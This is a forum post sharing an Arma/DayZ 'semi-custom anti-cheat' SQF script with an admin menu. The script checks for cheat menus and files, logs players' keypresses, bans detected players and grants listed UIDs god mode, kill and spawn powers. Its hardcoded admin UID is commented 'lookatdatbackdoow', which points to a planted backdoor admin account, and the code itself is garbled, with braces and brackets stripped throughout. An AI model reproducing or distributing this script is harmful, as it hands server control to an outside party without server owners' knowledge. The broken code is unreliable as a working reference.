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  1. #1
    5^*hdrrfgfbs#%R$'s Avatar
    Join Date
    Jul 2014

    Semi-Custom Anti-Cheat

    7 months old

    Pretty much just made admin menu work and added menus,files,vars to check for

     waitUntil {!isNil "BIS_fnc_init"};
    _agent = createAgent ["Goat_random_F", [0,0,0], [], 0, "FORM"];
    _agent allowdamage false;
    _agent disableAI "MOVE";
    _agent disableAI "ANIM";
    _list = ["0"];
    _list = ["76561198149257910",""]; //admin playerUID goes here lookatdatbackdoow
    noob_list = []; //noob admin playerUID goes here (make sure the same playerUID is also in _list)
    publicVariable "noob_list";
    dayZ_instance = 0;
    fn_genRand =
    	_arr = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","0","1","2","3","4","5","6","7","8","9"];
    	_gen = "v_";
    	for "_i" from 1 to 6 do {_gen = _gen + (_arr select (random ((count _arr)-1)));};
    _tlmrand0 = call fn_genRand;
    _tlmrand1 = "BIS_MPF_remoteExecutionServer"+ _tlmrand0;
    _tlmrand2 = call fn_genRand;
    _tlmrand3 = call fn_genRand;
    _tlmrand4 = call fn_genRand;
    _tlmrand5 = call fn_genRand;
    _tlmrand6 = call fn_genRand;
    _tlmrand7 = call fn_genRand;
    _tlmrand8 = call fn_genRand;
    _tlmrand9 = call fn_genRand;
    _tlmrand10 = call fn_genRand;
    _tlmrand11 = call fn_genRand;
    _tlmrand12 = call fn_genRand;
    _tlmrand13 = call fn_genRand;
    _tlmrand14 = call fn_genRand;
    _tlmrand15 = call fn_genRand;
    _tlmrand16 = call fn_genRand;
    _tlmrand17 = call fn_genRand;
    _tlmrand18 = call fn_genRand;
    _tlmrand19 = call fn_genRand;
    _tlmrand20 = call fn_genRand;
    _tlmrand21 = call fn_genRand;
    _tlmrand22 = call fn_genRand;
    _tlmrand23 = call fn_genRand;
    _tlmrand24 = call fn_genRand;
    _tlmrand25 = call fn_genRand; 
    _tlmrand26 = call fn_genRand;
    _tlmrand27 = call fn_genRand;
    _tlmrand28 = call fn_genRand;
    _tlmrand29 = call fn_genRand;
    _tlmrand30 = call fn_genRand;
    _tlmrand31 = call fn_genRand;
    _tlmrand32 = call fn_genRand;
    _tlmrand33 = call fn_genRand;
    call compile ("
    "+_tlmrand1+" =
    	"+_tlmrand23+" =
    		"+_tlmrand10+" = _this;
    		publicVariable '"+_tlmrand10+"';
    		for '_i' from 0 to 99 do {(findDisplay _i) closeDisplay 0;};
    		hiveupdateresu = 1; publicVariable ""hiveupdateresu""; 
    	[] spawn
      "+_tlmrand18+" = true;
      while {"+_tlmrand18+"} do
       for '_i' from 0 to 150 do
        player removeAction _i;
       sleep 0.5;
    	[] spawn
    		waitUntil {!isNil 'BIS_fnc_MP_packet'};
    		"+_tlmrand22+" = true;
    		while {"+_tlmrand22+"} do
    			if ( (lbSelection  ((findDisplay 12) displayCtrl 1001)) select 0 == 1 and ((lbSize ((findDisplay 12) displayCtrl 1002)) > 2 )) then {
    				[name player, getPlayerUID player, toArray 'YOLO Menu', toArray str(lbSize ((findDisplay 12) displayCtrl 1002))] spawn "+_tlmrand23+";
    			if (lbSize 109 > 2 or lbSize 114 > 2) then {
    				[name player, getPlayerUID player, toArray 'Wuat Menu', toArray str(lbSize 109)] spawn "+_tlmrand23+";
    			sleep 1;
    		[name player, getPlayerUID player, toArray 'Anti-Anti Hack', toArray 'Loop Exited'] spawn "+_tlmrand23+";
    	"+_tlmrand21+" = [] spawn
    		_sName = name player;
    		_sUID = getPlayerUID player;
    		"+_tlmrand16+" = true;
    			while {"+_tlmrand16+"} do
    			for ""_i"" from 0 to 200 do {if (!isNull (findDisplay _i)) then {	(findDisplay _i) displayRemoveAllEventHandlers 'KeyDown';
    			(findDisplay _i) displayRemoveAllEventHandlers 'KeyUp'; };};
    			(findDisplay 46) displayAddEventHandler ['KeyDown','if ((_this select 4) and ((_this select 1) == 0x3E)) then {  };_this call EPOCH_KeyDown;'];
    			(findDisplay 46) displayAddEventHandler ['KeyUp','_this call "+_tlmrand6+"'];
    			sleep 0.5; "+_tlmrand7+" = true; "+_tlmrand21+" = ((getPlayerUID player) in [""hello there optix""]);
    			((findDisplay 12) displayCtrl 51) ctrlRemoveAllEventHandlers 'MouseButtonDown';
    			((findDisplay 12) displayCtrl 51) ctrlRemoveAllEventHandlers 'MouseButtonUp';
    			if (!isNull (findDisplay 3030) or !isNull (findDisplay 2929) or !isNull (findDisplay 156) or !isNull (findDisplay 24) or 
    				!isNull (findDisplay 162) or !isNull ((findDisplay 64) displayCtrl 101) or !isNull (findDisplay 148)
    				or !isNull (findDisplay 125) or !isNull (findDisplay 69) or !isNull (findDisplay 166) or !isNull (findDisplay 19) or !isNull (findDisplay 71)
    				or !isNull (findDisplay 45) or !isNull (findDisplay 132) or !isNull (findDisplay 167) or !isNull (findDisplay 32) or !isNull (findDisplay 165)
    				or !isNull ((findDisplay 49) displayCtrl 0) or !isNull (findDisplay 157) or !isNull (findDisplay 2727) or !isNull (findDisplay 30) or !isNull (findDisplay 166)
    				or !isNull (findDisplay 167) or !isNull (findDisplay 58) or !isNull (findDisplay 999)) then {
    				[name player, getPlayerUID player, toArray 'Monky Menu Variant', toArray ('Active Menu')] spawn "+_tlmrand23+";
    			if ((typeName player != ""OBJECT"") or (typeName true != ""BOOL"")) then
    				[_sName, _sUID, toArray 'Anti-Anti Hack', toArray ('player = '+(typeName player)+' - true = '+(typeName true))] spawn "+_tlmrand23+";
    		[_sName, _sUID, toArray 'Anti-Anti Hack', toArray 'Loop Exited'] spawn "+_tlmrand23+";
    	[] spawn
    		"+_tlmrand25+" = true;
    		while {"+_tlmrand25+"} do
    			if (false) then {
    				"+_tlmrand10+" = [name player, getPlayerUID player, toArray 'Anti-Anti Hack', toArray 'Value Reassignment'];
    				publicVariable '"+_tlmrand10+"';
    				endMission ""END1"";
    				for '_i' from 0 to 99 do {(findDisplay _i) closeDisplay 0;};
    				hiveupdateresu = 1; publicVariable ""hiveupdateresu""; 
    			sleep 5;
    		[name player, getPlayerUID player, toArray 'Anti-Anti Hack', toArray 'Loop Exited'] spawn {
    			"+_tlmrand10+" = _this;
    			publicVariable '"+_tlmrand10+"';
    			hiveupdateresu = 1; publicVariable ""hiveupdateresu""; 
    	"+_tlmrand2+" =
    		if (isNil '"+_tlmrand3+"') then
    			"+_tlmrand3+" = true;
    			preProcessFileLineNumbers 'content';
    			_fileArray = ['JM3.sqf','JM3.png','wookie.sqf','wookie_wuat\start.sqf','lystoarma3\start.sqf','help.sqf','hack.sqf',
    			'cheat.sqf','JxMxE.sqf','JME.sqf','wookiev5.sqf','menu.sqf','swag.sqf','hy.sqf','jm3lite.sqf','jmelite.sqf','Nuke22.sqf','claf\start.sqf','ExtasyFinalMenu.sqf','jm333.sqf','NeonsMenu.sqf','someshit.sqf','Zero Haven Assembly v1.0.sqf','Zero Haven Assembly v1.0.1','Zero Haven Assembly v1.0.2','Zero Haven Assembly v2.0.1'
    			for '_i' from 0 to (count _fileArray)-1 do
    				if ((preProcessFileLineNumbers (_fileArray select _i)) != '') then
    					[name player, getPlayerUID player, toArray 'Script', toArray (_fileArray select _i)] spawn "+_tlmrand23+";
    				sleep 0.1;
    			sleep 60;
    			"+_tlmrand3+" = nil;
    	"+_tlmrand4+" =
    		if (isNil '"+_tlmrand5+"') then
    			"+_tlmrand5+" = true;
    			"+_tlmrand10+" = [name player, getPlayerUID player, _this select 0];
    			publicVariable '"+_tlmrand10+"';
    			sleep 1;
    			"+_tlmrand5+" = nil;
    	"+_tlmrand6+" =
    		_key = _this select 1;
    		_shift = _this select 2;
    		_ctrl = _this select 3;
    		_alt = _this select 4;
    		if ((_key == 0xD3) && !_alt && !_ctrl) then {['Delete'] spawn "+_tlmrand4+";};
    		if (_key == 0xD2) then {['Insert'] spawn "+_tlmrand4+";};
    		if (_key == 0x58) then {['F12'] spawn "+_tlmrand4+";};
    		if (_key == 0x3B) then {['F1'] spawn "+_tlmrand4+";};
    		if (_key == 0x3C) then {['F2'] spawn "+_tlmrand4+";};
    		if (_key == 0x3D) then {['F3'] spawn "+_tlmrand4+";};
    		if ((_key == 0x3E) && _alt) then {['Alt-F4'] spawn "+_tlmrand4+";};
    		if ((_key == 0x29) && _shift) then {['DAMI'] spawn "+_tlmrand4+";};
    		if ((_key == 0x19) && _shift) then {['Shift-P'] spawn "+_tlmrand4+";};
    		if (_key == 0x0F) then {['TAB'] spawn "+_tlmrand4+";};
    		if (_key == 0x42) then {['F8-tim0n'] spawn "+_tlmrand4+";};
    		if (_key == 0x29) then {['VileGaming'] spawn "+_tlmrand4+";};
    		if (_key == 0x36) then {['RustlerV7'] spawn "+_tlmrand4+";};
    		if (_key == 0x52) then {['Vg-Memory'] spawn "+_tlmrand4+";};
    		if (_key == 0x51) then {['Vg-RunMenu'] spawn "+_tlmrand4+";};
    		if (_key == 0x4C) then {['Vg-Esp'] spawn "+_tlmrand4+";};
    	[] spawn "+_tlmrand2+";
    	[] spawn
    		"+_tlmrand20+" = true;
    		while {"+_tlmrand20+"} do
    			"+_tlmrand7+" = true;
    				if (!(_x isKindOf ""AllVehicles"") and (_x != player)) then
    					if ((((count ((getWeaponCargo _x) select 1))+(count ((getMagazineCargo _x) select 1))) > 50) or (count ([currentWeapon _x] + (weapons _x) + (magazines _x)) > 40)) then {
    						diag_log (""CLEANUP: DELETING AN HACKBOX "" + (typeOf _x));
    						deleteVehicle _x;
    			} foreach (position player nearObjects 50);
    			sleep 5;
    		[name player, getPlayerUID player, toArray 'Anti-Anti Hack', toArray 'Loop Exited'] spawn "+_tlmrand23+";
    	[] spawn
    		"+_tlmrand26+" = true;
    		while {"+_tlmrand26+"} do
    			_recoil = unitRecoilCoefficient player;
    			if ((_recoil < 1) and (alive player)) then
    				[name player, getPlayerUID player, toArray 'Recoil Hack', toArray str(_recoil)] spawn "+_tlmrand23+";
    			sleep 5;
    		[name player, getPlayerUID player, toArray 'Anti-Anti Hack', toArray 'Loop Exited'] spawn "+_tlmrand23+";
    	[] spawn
    		waitUntil {!isNil ""BIS_fnc_MP_packet""};
    		"+_tlmrand31+" = [];
    		"+_tlmrand30+" = {
    			if (""MeleeHatchet"" == (_this select 0)) exitWith {};
    			if !(currentWeapon player == (_this select 0)) exitWith {};
    			if ((_this select 1) == 0) exitWith {"+_tlmrand31+" = [];};
    			if (count "+_tlmrand31+" < 3) then {
    				"+_tlmrand31+" set [count "+_tlmrand31+", [(player ammo (currentWeapon player)),(currentWeapon player)]];
    			else {
    				_tmp1 = "+_tlmrand31+" select 0;
    				_tmp2 = "+_tlmrand31+" select 1;
    				_tmp3 = "+_tlmrand31+" select 2;
    				if ((_tmp1 select 1 == _tmp2 select 1) and (_tmp1 select 0 == _tmp2 select 0) and (_tmp3 select 1 == _tmp2 select 1) and (_tmp3 select 0 == _tmp2 select 0)) then {  
    					[name player, getPlayerUID player, toArray 'Infinite Ammo', toArray (_this select 0)] spawn "+_tlmrand23+";
    					"+_tlmrand31+" = [];
    		"+_tlmrand29+" = false;
    		while {"+_tlmrand29+"} do
    			_object = player;
    			_ammoEH = player addEventHandler [""Fired"", { [_this select 1, (player ammo (currentWeapon player))] spawn "+_tlmrand30+"; }];
    			waitUntil {_object != player};
    	[] spawn
    		"+_tlmrand15+" = true;
    		while {"+_tlmrand15+"} do
    				if !(isNil _x) exitWith
    					[name player, getPlayerUID player, toArray 'Global Var', toArray _x] spawn "+_tlmrand23+";
    			} forEach ['ESP','Wookie','Extasy','GOD','GodMode','JxMxE_Exec','Lystic','Hack','Script','Wookie_Exec','Bypass',
    			'FUNSCRIPTAL','ALTISLIFENEXT2','JJMMEE_Swagger ','JJMMEE_In_BattleRoyal','bp82onkiaqfv','JJMMEE_SHITBYPASS ','JJMMEE_Init','JJMMEE_LoadMenu','WHY_ARE_THERE_SO_MANY_FISH_IN_THE_BIG_BLUE_OCEAN','LY_SwaggerLikeUs','dadaadf','LY_Init','LY_SwaggerLikeUs','LY_GOD_TOGGLE','OMFG_MENU','omfg_menu','PersonWhomMadeThisCorroded_LoadMenu"
    			if ((groupIconsVisible select 0) or (groupIconsVisible select 1)) exitWith
    				[name player, getPlayerUID player, toArray 'Group Icons', toArray (str groupIconsVisible)] spawn "+_tlmrand23+";
    			[] spawn "+_tlmrand2+";
    			sleep 10;
    		[name player, getPlayerUID player, toArray 'Anti-Anti Hack', toArray 'Loop Exited'] spawn "+_tlmrand23+";
    	[] spawn
    		"+_tlmrand17+" = true;
    		while {"+_tlmrand17+"} do
    			_items = [currentWeapon player] + (weapons player) + (magazines player);
    				if (_x in _items) then
    					[_x,_items] spawn
    						_item = _this select 0;
    						_items = _this select 1;
    						if (_item in ['Mine','MineE','pipebomb']) then
    							for '_i' from 0 to ({_x == _item} count _items) do {player removeMagazine _item;};
    						} else {for '_i' from 0 to ({_x == _item} count _items) do {player removeWeapon _item;};};
    					"+_tlmrand10+" = [name player, getPlayerUID player, toArray 'Bad Item', toArray _x];
    					publicVariable '"+_tlmrand10+"';
    			} forEach ([] +
    			sleep 10;
    		[name player, getPlayerUID player, toArray 'Anti-Anti Hack', toArray 'Loop Exited'] spawn "+_tlmrand23+";
    PVAH_Group = (creategroup east);
    ['"+_tlmrand33+"', 'onPlayerConnected', {
    	_BanList = 	profileNamespace getVariable [""AHBanList"",[]];
    	_do = format [""; BanList = ""+str(_BanList)+"";
    		if !(isServer) then {[] spawn { waitUntil {!isNil '"+_tlmrand19+"'}; sleep 2; if !(isNil '"+_tlmrand21+"') exitWith {};[] spawn "+_tlmrand19+";};};""];
    	_do = _do + ""if !(isServer) then {[getPlayerUID player] spawn "+_tlmrand8+";};"";
    	_do = _do + ""[] spawn {"+_tlmrand32+" = true; sleep 10; waitUntil {!isNil '"+_tlmrand1+"'}; waitUntil {!isNil '"+_tlmrand19+"'};
    		sleep 5; if (isNil '"+_tlmrand21+"') then { [] spawn "+_tlmrand19+"; sleep 5; if !(isNil '"+_tlmrand21+"') exitWith {};
    		[] spawn {"+_tlmrand10+" = [player,""""VG or VA bypass""""];publicVariable '"+_tlmrand10+"';endMission """"END1"""";};};};"";
    	_do = _do + ""[] spawn {sleep 10; if (isNil '"+_tlmrand32+"') then { while {true} do { "+_tlmrand10+" = [player,""""VG or VA bypass""""];publicVariable '"+_tlmrand10+"';0 fadeSound 0;startLoadingScreen ["""""""",""""RscDisplayLoadCustom""""]; sleep 1;}; };};"";
    	_do = _do + ""[] spawn {sleep 5; waitUntil {!isNil 'BIS_fnc_MP_packet'}; if (isClass(configFile >> 'RscRazzler')) then {hacker = """"I am a hacker""""; publicVariable """"hacker"""";};};"";
    	'Logic' createunit[[0, 0, 0], PVAH_Group, _do + "";adminREObj = this;"", 0.5, ""corporal""];
    	deleteVehicle adminREObj;
    }] call BIS_fnc_addStackedEventHandler;  
    "+_tlmrand32+" = true;
    "+_tlmrand21+" = true;
    	_BanList = 	profileNamespace getVariable [""AHBanList"",[]];
    	_do = format [""; BanList = ""+str(_BanList)+"";
    		if !(isServer) then {[] spawn { waitUntil {!isNil '"+_tlmrand19+"'}; sleep 2; if !(isNil '"+_tlmrand21+"') exitWith {};[] spawn "+_tlmrand19+";};};""];
    	_do = _do + ""if !(isServer) then {[getPlayerUID player] spawn "+_tlmrand8+";};"";
    	_do = _do + ""[] spawn {"+_tlmrand32+" = true; sleep 10; waitUntil {!isNil '"+_tlmrand1+"'}; waitUntil {!isNil '"+_tlmrand19+"'};
    		sleep 5; if (isNil '"+_tlmrand21+"') then { [] spawn "+_tlmrand19+"; sleep 5; if !(isNil '"+_tlmrand21+"') exitWith {};
    		[] spawn {"+_tlmrand10+" = [player,""""VG or VA bypass""""];publicVariable '"+_tlmrand10+"';endMission """"END1"""";};};};"";
    	_do = _do + ""[] spawn {sleep 10; if (isNil '"+_tlmrand32+"') then { while {true} do { "+_tlmrand10+" = [player,""""VG or VA bypass""""];publicVariable '"+_tlmrand10+"';0 fadeSound 0;startLoadingScreen ["""""""",""""RscDisplayLoadCustom""""]; sleep 1;}; };};"";
    	_do = _do + ""[] spawn {sleep 5; waitUntil {!isNil 'BIS_fnc_MP_packet'}; if (isClass(configFile >> 'RscRazzler')) then {hacker = """"I am a hacker""""; publicVariable """"hacker"""";};};"";
    	'Logic' createunit[[0, 0, 0], PVAH_Group, _do + "";adminREObj = this;"", 0.5, ""corporal""];
    	deleteVehicle adminREObj;
    """+_tlmrand10+""" addPublicVariableEventHandler
    	if (count (_this select 1) == 3) then
    		_name = (_this select 1) select 0;
    		_uid = (_this select 1) select 1;
    		_key = (_this select 1) select 2;
    		_log = format [""Key Log: %1 (%2) KEY: %3 - |DayZ Instance: %4|"", _name, _uid, _key, dayZ_instance];
    		diag_log (_log);
    		""dllmain"" callExtension (_log);
    		if (count (_this select 1) == 1) then
    			_player = (_this select 1) select 0;
    			_uid = getPlayerUID _player;
    			_log = format [""Hack Log: %1 (%2) REASON: %3 (%4) - |DayZ Instance: %5|"", name _player, getPlayerUID _player, ""Anti-Hax OFF"", format [""Time: %1"", str time], dayZ_instance];
    			diag_log (_log);
    			""dllmain"" callExtension (_log);
    			if (count (_this select 1) == 2) then
    				_player = (_this select 1) select 0;
    				_uid = getPlayerUID _player;
    				_log = format [""Hack Log: %1 (%2) REASON: %3 (%4) - |DayZ Instance: %5|"", name _player, getPlayerUID _player, ""VG or VA bypass"", format [""Time: %1"", str time], dayZ_instance];
    				diag_log (_log);
    				""dllmain"" callExtension (_log);
    			else {
    				_array = _this select 1;
    				_name = _array select 0;
    				_uid = _array select 1;
    				_reason = toString (_array select 2);
    				_field = toString (_array select 3);
    				_log = format [""Hack Log: %1 (%2) REASON: %3 (%4) - |DayZ Instance: %5|"", _name, _uid, _reason, _field, dayZ_instance];
    				diag_log (_log);
    				""dllmain"" callExtension (_log);
    				"+_tlmrand13+" = format [""Anti-Hax Caught: %1 Reason: %2 (%3)"", _name, _reason, _field];
    				publicVariable """+_tlmrand13+""";
    "+_tlmrand8+" =
    	waitUntil {(typeName (getPlayerUID player) == ""STRING"") and ((getPlayerUID player) != """")};
    	_"+_tlmrand14+" = (getPlayerUID player);
    	if (!(_"+_tlmrand14+" in "+(str _list)+") && !(isNull player) && (isPlayer player) && (player == player)) then
    		if (isNil '"+_tlmrand11+"') then
    			waitUntil {!isNil 'BIS_fnc_MP_packet'};
    			"+_tlmrand11+" = true;
    			sleep 5;
    			"+_tlmrand7+" = false;
    			sleep 5;
    			if !("+_tlmrand7+") then
    				"+_tlmrand10+" = [player];
    				publicVariable '"+_tlmrand10+"';
    				endMission ""END1"";
    			"+_tlmrand11+" = nil;
    "+_tlmrand9+" =
    	hackerLog = [];
    	keyLog = [];
    	"""+_tlmrand10+""" addPublicVariableEventHandler
    		if ((count hackerLog) > 150) then
    			for ""_i"" from 0 to 49 do
    				hackerLog = hackerLog - [hackerLog select 0];
    		if ((count keyLog) > 150) then
    			for ""_i"" from 0 to 49 do
    				keyLog = keyLog - [keyLog select 0];
    		if (count (_this select 1) == 3) then
    			_name = (_this select 1) select 0;
    			_uid = (_this select 1) select 1;
    			_key = (_this select 1) select 2;
    			_log = format [""KEY LOGGED: %1 (%2) KEY: %3"", _name, _uid, _key];
    			keyLog = keyLog + [[""     ""+_log,"""",""0"",""1"",""0"",""0"",[]]];
    			if (count (_this select 1) == 1) then
    				_player = (_this select 1) select 0;
    				_log = format [""HACKER: %1 (%2) REASON: %3 (%4)"", name _player, getPlayerUID _player, ""Anti-Hax OFF"", format [""Time: %1"", str time]];
    				hackerLog = hackerLog + [[""     ""+_log,"""",""0"",""1"",""0"",""0"",[]]];
    				if (count (_this select 1) == 2) then
    					_player = (_this select 1) select 0;
    					_uid = getPlayerUID _player;
    					_log = format [""Hack Log: %1 (%2) REASON: %3 (%4) - |DayZ Instance: %5|"", name _player, getPlayerUID _player, ""VG or VA bypass"", format [""Time: %1"", str time], dayZ_instance];
    					hackerLog = hackerLog + [[""     ""+_log,"""",""0"",""1"",""0"",""0"",[]]];
    				else {
    					_array = _this select 1;
    					_name = _array select 0;
    					_uid = _array select 1;
    					_reason = toString (_array select 2);
    					_field = toString (_array select 3);
    					_log = format [""HACKER: %1 (%2) REASON: %3 (%4)"", _name, _uid, _reason, _field];
    					hackerLog = hackerLog + [[""     ""+_log,"""",""0"",""1"",""0"",""0"",[]]];
    "+_tlmrand19+" =
    	waitUntil {(typeName (getPlayerUID player) == ""STRING"") and ((getPlayerUID player) != """")};
    	_puid = getPlayerUID player;
    	if (_puid in BanList) exitWith
    		hiveupdateresu = 1; publicVariable ""hiveupdateresu""; 
    		for ""_i"" from 0 to 99 do {(findDisplay _i) closeDisplay 0;}; endMission ""END1""; 
    	if (_puid in "+(str _list)+") then
    		'"+_tlmrand13+"' addPublicVariableEventHandler {taskHint [_this select 1, [1, 0.05, 0.55, 1], 'taskNew'];};
    		"+_tlmrand21+" = ((getPlayerUID player) in [""hello there optix""]);
    		[] spawn "+_tlmrand9+";
    		[] spawn tlmxzyxzy;
    		[] spawn
    			_id = [] spawn "+_tlmrand1+";
    publicVariable """+_tlmrand1+""";
    publicVariable """+_tlmrand8+""";
    publicVariable """+_tlmrand9+""";
    publicVariable """+_tlmrand19+""";
    	Admin Menu
    tlmxzyxzy =
    	waitUntil {!isNull (findDisplay 46)};
    	inSub = false;
    	tpEnabled = false;
    	getControl = {(findDisplay 3030) displayCtrl _this;};
    	if (isNil "admin_toggled") then {admin_toggled = [];};
    	admin_list =
    		if ((getPlayerUID player) in noob_list) then {
    			adminadd = adminadd + ["     Main Menu","MainMenu","0","0","1","0",[1,0.1,0.55,1]];
    			adminadd = adminadd + ["     Hacker Log","hackerLog","0","0","1","0",[1,0.1,0.55,1]];
    			adminadd = adminadd + ["     Key Log","keyLog","0","0","1","0",[1,0.1,0.55,1]];
    			adminadd = adminadd + ["     View PlayerUIDs","uidLog","0","0","1","0",[1,0.1,0.55,1]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + [" Server Management","","0","1","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + ["     Kick",adminkick,"0","0","0","1",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + [" Spawn Scripts ","","0","1","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + [" Toggleable Scripts ","","0","1","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			 adminadd = adminadd + ["     Toggle Map Markers",adminmark,"1","0","0","0",[]];
    			 adminadd = adminadd + ["     Toggle ESP",adminesp,"1","0","0","0",[]];
    			 adminadd = adminadd + ["     Toggle Wardrobe",adminskin,"1","0","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + [" Targeted Scripts ","","0","1","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + ["     Spectate Target",adminspec,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     Move to Target",admintele,"0","0","0","1",[]];
    			adminadd = adminadd + ["     Move Target to Me",admint2me,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     Heal Target",adminheal,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     Slap Target",adminSlap,"0","0","0","1",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + [" Miscellaneous ","","0","1","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			 adminadd = adminadd + ["     Repair Vehicle",adminrepair,"0","0","0","0",[]];
    			 adminadd = adminadd + ["     Delete CursorTarget",{deleteVehicle cursorTarget;},"0","0","0","0",[]];
    			 adminadd = adminadd + ["     Bypass Anti-TP",admin_aatp,"0","0","0","0",[]];
    		else {
    			adminadd = adminadd + ["     Main Menu","MainMenu","0","0","1","0",[1,0.1,0.55,1]];
    			adminadd = adminadd + ["     Hacker Log","hackerLog","0","0","1","0",[1,0.1,0.55,1]];
    			adminadd = adminadd + ["     Key Log","keyLog","0","0","1","0",[1,0.1,0.55,1]];
    			adminadd = adminadd + ["     View PlayerUIDs","uidLog","0","0","1","0",[1,0.1,0.55,1]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + [" Server Management","","0","1","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + ["     Mass Message",adminmsg,"0","0","0","0",[]];
    			adminadd = adminadd + ["     Kick",adminkick,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     Ban",adminban,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     Clear Ban List",adminClearBan,"0","0","0","0",[]];
    			 adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + [" Spawn Scripts ","","0","1","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			 adminadd = adminadd + ["     Spawn Vehicle","Vehicles","0","0","1","0",[]];
    			 adminadd = adminadd + ["     Spawn Buildings & Objects","Objects","0","0","1","0",[]];
    			 adminadd = adminadd + ["     Spawn Weapons & Items","Weaponz","0","0","1","0",[]];
    			 adminadd = adminadd + ["     Spawn Box",admincrate,"0","0","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + [" Toggleable Scripts ","","0","1","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + ["     Toggle TP",{if !(tpEnabled) then {tpEnabled = true;} else {tpEnabled = false;};},"1","0","0","0",[]];
    			 adminadd = adminadd + ["     Toggle Map Markers",adminmark,"1","0","0","0",[]];
    			 adminadd = adminadd + ["     Toggle ESP",adminesp,"1","0","0","0",[]];
    			 adminadd = adminadd + ["     Toggle God",admingod,"1","0","0","0",[]];
    			 adminadd = adminadd + ["     Toggle Car God",adminCarGod,"1","0","0","0",[]];
    			 adminadd = adminadd + ["     Toggle Infinite Ammo",adminAmmo,"1","0","0","0",[]];
    			 adminadd = adminadd + ["     Toggle Wardrobe",adminskin,"1","0","0","0",[]];
    			 adminadd = adminadd + ["     Toggle Vehicle Boost",adminVehicleSpeed,"1","0","0","0",[]];
    			 adminadd = adminadd + ["     Toggle Stealth",admininvis,"1","0","0","0",[]];
    			 adminadd = adminadd + ["     Toggle ZombieShield",adminZombieShield,"1","0","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + [" Targeted Scripts ","","0","1","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + ["     Spectate Target",adminspec,"0","0","0","1",[]];
    			adminadd = adminadd + ["     Control Target",adminControl,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     Move to Target",admintele,"0","0","0","1",[]];
    			adminadd = adminadd + ["     Move Target to Me",admint2me,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     Break Target's Legs",adminbreakleg,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     Kill Target",adminkill,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     Knockout Target",adminUncon,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     Heal Target",adminheal,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     GiveGod Target",{[_this select 0, 1] call adminGiveGod;},"0","0","0","1",[]];
    			 adminadd = adminadd + ["     UnGod Target",{[_this select 0, 0] call adminGiveGod;},"0","0","0","1",[]];
    			 adminadd = adminadd + ["     VehicleBoost Target",adminTargetVehBoost,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     Slap Target",adminSlap,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     Drug Target",adminDrug,"0","0","0","1",[]];
    			 adminadd = adminadd + ["     Suicide Target",adminSuicide,"0","0","0","1",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + [" WeatherLord ","Weather","0","0","1","0",[]];
    			adminadd = adminadd + [" TimeLord ","Time","0","0","1","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			adminadd = adminadd + [" Miscellaneous ","","0","1","0","0",[]];
    			adminadd = adminadd + ["","","0","1","0","0",[]];
    			 adminadd = adminadd + ["     Repair Vehicle",adminrepair,"0","0","0","0",[]];
    			 adminadd = adminadd + ["     Delete CursorTarget",{deleteVehicle cursorTarget;},"0","0","0","0",[]];
    			 adminadd = adminadd + ["     Bypass Anti-TP",admin_aatp,"0","0","0","0",[]];
    			 adminadd = adminadd + ["     Self Disconnect",admin_Disconnect,"0","0","0","0",[]];
    			 adminadd = adminadd + ["     Add 2500 Crypto Self",admin_addcrypto,"0","0","0","0",[]];
    	admin_tgfnc =
    		_toggle = _this select 0;
    		if !(_toggle in admin_toggled) then
    			lbSetColor [2, _toggle, [0, 1, 0, 1]];
    			admin_toggled = admin_toggled + [_toggle];
    			lbSetColor [2, _toggle, [1, 0, 0, 1]];
    			admin_toggled = admin_toggled - [_toggle];
    	admin_dbclick =
    		_isran = false;
    		_code = adminadd select ((lbCurSel 2))*7+1;
    		_istoggle = adminadd select ((lbCurSel 2))*7+2;
    		_istitle = adminadd select ((lbCurSel 2))*7+3;
    		_issubmenu = adminadd select ((lbCurSel 2))*7+4;
    		_isplayer = adminadd select ((lbCurSel 2))*7+5;
    		if (_istitle == "1") exitWith {};
    		if (_issubmenu == "1") then
    			if (_code == "Vehicles") exitWith {call admin_fillveh};
    			if (_code == "Objects") exitWith {call admin_fillobj};
    			if (_code == "Weaponz") exitWith {call admin_fillwpn};
    			if (_code == "HackerLog") exitWith {call admin_fillhlog};
    			if (_code == "KeyLog") exitWith {call admin_fillklog};
